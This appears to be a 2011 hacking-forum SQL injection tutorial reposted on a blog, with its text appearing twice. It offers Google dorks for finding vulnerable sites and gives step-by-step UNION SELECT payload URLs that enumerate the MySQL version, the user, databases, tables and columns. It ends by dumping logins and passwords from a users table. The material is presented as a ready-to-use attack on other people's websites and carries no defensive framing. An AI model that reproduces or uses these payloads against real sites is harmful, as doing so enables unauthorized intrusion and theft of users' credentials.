SQL injection Tutorial
To find Vulnerable sites you are going to use Google Dorks.
Some common dorks are:
You can read my tutorial on how to use SQL injection scanner called "SQL Poizon":
http://www.hackforums.net/showthread.php?tid=1124572
lets say you got this site:
if we add a ' before or after the numbers it should look something like this if its vulnerable:
![[Image: sqlitut1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v_2q9lLw7pBiBZHnvV11BX6_4RB1a3wpmUYOAjragSd29BKAFbxLki-Umv791k8u8eAWuBF4JwK0THW4vfIPCRj51ZS0ID6dwbzdBUgY7eAGP_QywtAS0=s0-d)
To find the right amound of columns we are using "order by". here is how it works:
This means or site has 8 columns and we will now move over to "union select".
This is how it works:
Note the hyphen - before the numbers!
This should make the website to show some numbers on the screen like this:
![[Image: sqlitut2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t60HR6f2nrtYPE49__V6Yqaw3lLNQv29O4SUZMESMOEhUhv4GftFDeMQvZXBp-ZQbWrEC-YW86DVow4GGwqCcOY_gGV441oBICBDMehHn5VQiM2K94AmE=s0-d)
This meens its absolutly sure that the site is vulnerable to sql injection.
Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).
![[Image: sqlitut3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ua8i3EUzP0bGg4IsrX83S3E52tV1P1Us57BYR_LhDSMtgF1f_zbnfBYFlDbnvtDp2fZ1Rqo-CoN6Id1H-4qw9tRMe6xDY394DlxaxpvKeij-OjF2o0qmc=s0-d)
To get the Current user you type this:
This should display:
![[Image: sqlitut4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v3kp6NwWpkvPZ5fg-W72VMMS1ErmrDOOm8sJVRNZQQ7LW8tnkzq48DMsrg3JsWBQSBcLEr4RZxv0uJ_2yIPWNCHAdNcshRx5fjxvNYJYh3muhp5vgEHg=s0-d)
Now we wanna find the databases and the Current database.
Here the syntax for all databases:
It should displays something like this:
![[Image: sqlitut5.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vG0oowKWAjq1XLFi3hw6aGhvJ3e3Z3FhzZU8oYtijOoX-2Mmg7Q4cCpgJm4h31gZk9iZl_JBzQLb_cC4netpwlDKkEOhhpQ13rFQTiyJSnM7E4iLflgps=s0-d)
Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.
Syntax for current database:
This should display something like this:
![[Image: sqlitut6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tQLFGJVu7zGO-ZzAHRHLxpZ0WP_e9CfIQ6AeQ8_F2yXaKv4AN80OplV9IopW-IQejsQTmHleAi74YLFUXuD3KoDjF1WxJUJhTTUqdp9LYKLfZHhoH-iuQ=s0-d)
Now we want to know the tables on in the database and for this we will conintue using "union select".
Here is the code:
This should display something like this:
![[Image: sqlitut7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uYCnfb91is_TZRJjqmQzfdOd-M1Hoj1DksaRnaGW8ETYxQljfI9cIVjZj5JETLcTdpf32zxCro9SlLvO2ZXfcNYeG4ZWxVaKbHDr0KCs3dICGjqAwf-Q=s0-d)
We now know that the table that passwords should be stored in are called bpusers, write it down and move on.
Now we want to know the columns.
Here is the code:
This should display something like this:
![[Image: sqlitut8.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t4vb_rq7XaoxMrgLfbNYfmR-mAX9-6sy9tAfLvi1CRDasgxBy8QYI-zcMmmDMlP2LoAMWsn2Wsm9vC9cOEK_qZ62jTU1Ov75_NMmvz3WviI8WrBmUu=s0-d)
Now you would like to dump logins and passwords from bpusers.
Here is the code for thath:
This would display something like this:
![[Image: sqlitut9.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sXYFp0RcixheOViyHqMrmuBHPo7k71rEUyNWPKw-2le2n22nVSKbAHmLnKEoH3JDbTTqTWAzn7l1lwuHI50hNHNX-UtXPt3vCVwz4NAAMVC_z_GdtAEgg=s0-d)
(NOTE: 0x3a will make a : between logins and passwords.)
You have now performed a SQL injection attack.
I have worked hard on this, please don't leech it.
If you do, give credits to me.
© Copyright Join7 2011
- Finding vulnerable sites
- Finding amount of columns
- Getting mysql version current user
- Getting Databases
- Getting Tables
- Getting Columns
- Getting Usernames and Passwords
1. Finding vulnerable sites
To find Vulnerable sites you are going to use Google Dorks.
Some common dorks are:
Code:
inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=You can read my tutorial on how to use SQL injection scanner called "SQL Poizon":
http://www.hackforums.net/showthread.php?tid=1124572
lets say you got this site:
Code:
http://site.com/news/view.php?id=8282. Finding amount of columns
To find the right amound of columns we are using "order by". here is how it works:
Code:
http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)This means or site has 8 columns and we will now move over to "union select".
This is how it works:
Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--Note the hyphen - before the numbers!
This should make the website to show some numbers on the screen like this:
This meens its absolutly sure that the site is vulnerable to sql injection.
3. Getting MySQL version and Current User
Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).
Code:
http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--To get the Current user you type this:
Code:
http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--This should display:
4. Getting Databases
Now we wanna find the databases and the Current database.
Here the syntax for all databases:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--It should displays something like this:
Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.
Syntax for current database:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8This should display something like this:
5. Getting Tables
Now we want to know the tables on in the database and for this we will conintue using "union select".
Here is the code:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--This should display something like this:
We now know that the table that passwords should be stored in are called bpusers, write it down and move on.
6. Getting Columns
Now we want to know the columns.
Here is the code:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--This should display something like this:
7. Dumping users/pass
Now you would like to dump logins and passwords from bpusers.
Here is the code for thath:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--This would display something like this:
(NOTE: 0x3a will make a : between logins and passwords.)
You have now performed a SQL injection attack.
I have worked hard on this, please don't leech it.
If you do, give credits to me.
© Copyright Join7 2011
Categories:
sql injection
